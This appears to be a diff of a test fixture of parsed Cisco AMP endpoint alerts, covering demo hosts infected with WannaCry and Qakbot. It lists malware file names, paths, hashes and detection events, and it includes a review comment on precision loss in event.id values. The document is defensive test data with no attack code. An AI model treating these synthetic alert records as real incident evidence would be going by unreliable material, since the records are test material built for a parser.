"user@testdomain.com", "input.type": "log", - "log.offset": 5147, - "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", - "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", - "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", - "process.name": "lsass.exe", - "process.pid": 708, + "log.offset": 19266, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -244,9 +955,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -254,49 +962,57 @@ ] }, { - "@timestamp": "2021-01-14T16:59:38.000Z", + "@timestamp": "2021-01-14T16:55:47.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411525251028484105", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 698000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411525251028484000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 3, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + 
"host.os.platform": "windows", "input.type": "log", - "log.offset": 9463, + "log.offset": 20509, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
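Review bot: The new-side `"event.id": 6419264043361501000` in this hunk is a JSON number at a magnitude (~6.4e18, above 2^53) that a float64 cannot represent exactly, and every `event.id` value on the new side of this file ends in `000` while the neighbouring `"cisco.amp.detection_id": "6419264043361501261"` keeps all digits as a string — this looks like the vendor identifier being cast through a float somewhere in the pipeline or the fixture generator, though the exact source field is not visible here. ECS defines `event.id` as a keyword, so losing the low digits makes distinct alerts collide on the same id and breaks deduplication and correlation against `cisco.amp.detection_id` downstream. The fixture should expect the identifier as a string, e.g. `"event.id": "6419264043361501261"`, and the ingest pipeline should copy it without a numeric conversion. The same pattern appears in the hunks at `@@ -309,66 +1025,58 @@`, `@@ -453,24 +1165,24 @@`, `@@ -508,24 +1218,24 @@`, `@@ -561,24 +1272,96 @@`, `@@ -594,49 +1377,49 @@` and `@@ -649,47 +1432,49 @@`.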
@@ -309,66 +1025,58 @@ ] }, { - "@timestamp": "2021-01-14T16:59:38.000Z", + "@timestamp": "2021-01-14T16:55:47.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6411525251028484104", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 183000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 763000000, + "event.action": "Retrospective Detection", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411525251028484000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "6894b3834bd541fa85df79e44568acac", - "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", - "file.name": "MspthrdHash.exe", - "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", 
"host.os.family": "windows", "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 12021, + "log.offset": 21869, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", - "6894b3834bd541fa85df79e44568acac", - "8cf0ca99a8f5019d8583133b9a9379299c45470c" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -387,10 +1095,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264043361501262", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -398,9 +1105,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -409,11 +1117,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 14506, + "log.offset": 23112, "related.hash": [ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], @@ -431,7 +1143,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -442,9 +1154,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229331435814969", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, "cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ 
@@ -453,24 +1165,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 779000000, + "cisco.amp.timestamp_nanoseconds": 718000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 15718, + "log.offset": 24355, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -486,7 +1198,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -497,10 +1209,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419204905956802579", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -508,24 +1218,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 716000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 16930, + "log.offset": 25559, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -541,7 +1251,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -552,8 +1262,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264043361501261", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -561,24 +1272,96 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 749000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 18142, + "log.offset": 26683, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + 
"cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 702000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28003, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -594,49 +1377,49 @@ ] }, { - "@timestamp": "2021-01-14T16:55:46.000Z", + "@timestamp": "2021-01-14T16:35:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "53:74:31:cb:37:50" + "mac": "02:2f:e0:10:03:5d" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229322845880359", - "cisco.amp.error.description": "Cannot delete", - "cisco.amp.error.error_code": 3221225761, + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, "cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "53:74:31:cb:37:50" + "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 718000000, + "cisco.amp.timestamp_nanoseconds": 729000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264039066534000, + "event.id": 6412622782676337000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", "fileset.name": "amp", - "host.hostname": "Demo_WannaCry_Ransomware", - "host.name": "Demo_WannaCry_Ransomware", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 24355, + "log.offset": 29323, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "related.hosts": [ - "Demo_WannaCry_Ransomware" + "Demo_Qakbot_3" ], "related.ip": [ "8.8.8.8", 
@@ -649,47 +1432,49 @@ ] }, { - "@timestamp": "2021-01-14T16:55:46.000Z", + "@timestamp": "2021-01-14T16:35:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "53:74:31:cb:37:50" + "mac": "02:2f:e0:10:03:5d" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264039066533964", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "53:74:31:cb:37:50" + "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 765000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264039066534000, + "event.id": 6412622782676337000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", "fileset.name": "amp", - "host.hostname": "Demo_WannaCry_Ransomware", - "host.name": "Demo_WannaCry_Ransomware", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 25559, + "log.offset": 30524, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "related.hosts": [ - "Demo_WannaCry_Ransomware" + "Demo_Qakbot_3" ], "related.ip": [ "8.8.8.8", 
@@ -713,7 +1498,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.detection_id": "6412622782676336646", "cisco.amp.error.description": "Object name not found", "cisco.amp.error.error_code": 3221225524, "cisco.amp.event_type_id": 2164260893, @@ -724,7 +1509,7 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 729000000, + "cisco.amp.timestamp_nanoseconds": 713000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" @@ -739,7 +1524,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 29323, + "log.offset": 31725, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -768,10 +1553,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", "cisco.amp.detection_id": "6412622782676336647", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -779,9 +1563,10 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 729000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -790,11 +1575,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", "fileset.name": "amp", "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 30524, + "log.offset": 32926, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -823,10 +1612,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", "cisco.amp.detection_id": "6412622782676336646", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -834,9 +1622,10 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 713000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -845,11 +1634,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", "fileset.name": "amp", "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 31725, + "log.offset": 34182, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], 
@@ -1241,7 +2034,176 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 69603, + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 
"2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 
553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1270,10 +2232,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229327140847665", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1281,9 +2242,10 @@ "cisco.amp.related.mac": [ 